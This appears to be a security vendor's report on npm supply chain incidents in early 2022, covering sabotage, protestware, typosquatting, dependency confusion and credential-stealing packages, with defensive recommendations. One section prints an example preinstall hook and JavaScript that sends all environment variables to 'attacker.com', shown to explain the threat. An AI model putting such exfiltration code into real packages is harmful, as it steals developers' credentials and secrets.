The first quarter of 2022 was the most eventful period for npm supply chain security since the registry's creation. In just three months, the JavaScript ecosystem weathered deliberate package sabotage, politically-motivated malware, and a steady stream of credential-stealing packages. This report examines the key incidents and identifies trends that security teams need to watch.
The Big Incidents
colors.js and faker.js Sabotage (January 2022)
The quarter opened with Marak Squires deliberately sabotaging colors.js (22M+ weekly downloads) and faker.js (2.8M+ weekly downloads). The colors.js update introduced an infinite loop that printed garbage text, while faker.js was wiped entirely. The incident affected thousands of downstream projects and led to the creation of the @faker-js/faker community fork.
Impact: Broken builds across the npm ecosystem. AWS CDK and other major projects were affected. Root cause: Single maintainer with sole publish access and no governance checks.
node-ipc Protestware (March 2022)
Brandon Nozaki Miller (RIAEvangelist) introduced geopolitically-targeted malware into his node-ipc package (1M+ weekly downloads). Versions 10.1.1 and 10.1.2 wiped files on systems with Russian or Belarusian IP addresses. The incident was tracked as CVE-2022-23812.
Impact: Data destruction for affected users. Vue.js CLI was a notable downstream dependency. Root cause: Maintainer weaponized their own package for political protest.
ua-parser-js Aftermath
While the initial ua-parser-js compromise occurred in October 2021, its effects continued into Q1 2022 as organizations discovered they had pulled in the malicious version. The incident involved a hijacked maintainer account publishing versions containing a cryptocurrency miner and credential stealer.
Typosquatting and Dependency Confusion
Beyond the headline incidents, Q1 2022 saw a steady increase in typosquatting packages designed to steal credentials and inject malware:
Notable Typosquats Discovered
- @azure/core-tracing variants: Multiple packages mimicking Microsoft's Azure SDK namespace were published with names like
core-tracingandazure-core-tracing, containing data exfiltration code - discord.js mimics: Packages like
discord.jssanddiscordd.jstargeted the massive Discord bot developer community - colors-related packages: Following the colors.js incident, multiple malicious packages with similar names appeared, exploiting confusion about which package was "safe"
Dependency Confusion Attempts
Researchers and attackers continued to exploit dependency confusion — publishing public packages with the same names as private internal packages. When package managers resolve the public package instead of the private one, the malicious code executes in the target's build environment.
JFrog and Sonatype both reported significant increases in dependency confusion attempts in Q1 2022, with packages targeting known enterprise namespaces.
Credential Stealers: The Quiet Epidemic
The most persistent threat in Q1 2022 was not the headline-grabbing incidents but the steady stream of packages designed to steal developer credentials. These packages typically:
- Include a
preinstallorpostinstallscript - Harvest environment variables (which often contain CI/CD tokens, API keys, and cloud credentials)
- Exfiltrate the stolen data to attacker-controlled servers
{
"name": "totally-legit-package",
"scripts": {
"preinstall": "node steal.js"
}
}
The exfiltration code is often obfuscated:
const https = require('https');
const os = require('os');
const data = JSON.stringify({
hostname: os.hostname(),
env: process.env, // All environment variables, including secrets
cwd: process.cwd(),
user: os.userInfo()
});
https.request({ hostname: 'attacker.com', method: 'POST' }, () => {}).end(data);
Sonatype reported removing over 700 malicious packages from npm in Q1 2022 alone, with credential theft being the most common payload.
Emerging Trends
Trend 1: Protestware as a Category
The node-ipc incident established "protestware" as a recognized threat category. Multiple packages introduced protest-related code in the weeks following the Russia-Ukraine conflict's escalation. While most were benign (displaying messages), the precedent of destructive protestware created a new dimension of supply chain risk.
Trend 2: Install Script Abuse
Malicious npm packages overwhelmingly rely on preinstall and postinstall scripts for execution. This is the primary attack vector because it requires no action from the developer beyond npm install. The community debated disabling install scripts by default, but no consensus was reached.
Trend 3: Targeting Developer Machines
Supply chain attacks increasingly target developer machines rather than production systems. A developer's laptop typically has access to source code repositories, cloud credentials, package publishing tokens, and internal systems. Compromising a developer machine can be the first step toward a much larger breach.
Trend 4: Speed of Publication
Malicious packages are being published and discovered faster than ever, creating a race between attackers and defenders. Some malicious packages were discovered within hours of publication; others persisted for weeks.
Defensive Recommendations
Based on Q1 2022 trends, we recommend:
-
Disable install scripts for untrusted packages using
.npmrc:ignore-scripts=trueThen explicitly enable them only for packages that need them.
-
Use a lockfile and audit lockfile changes in every code review.
-
Implement namespace/scope policies to prevent internal package names from being resolved to public registries.
-
Monitor for new dependencies added to your projects — any new dependency should be reviewed before merging.
-
Run builds in sandboxed environments that cannot exfiltrate data to the internet.
How Safeguard.sh Helps
Safeguard.sh continuously monitors the npm registry and other package ecosystems for malicious packages, typosquats, and dependency confusion attacks. Our platform alerts you when any package in your dependency tree is flagged as malicious, compromised, or abandoned. With real-time SBOM analysis, Safeguard.sh helps you respond to incidents like the colors.js sabotage or node-ipc protestware within minutes of disclosure, identifying every affected project across your organization.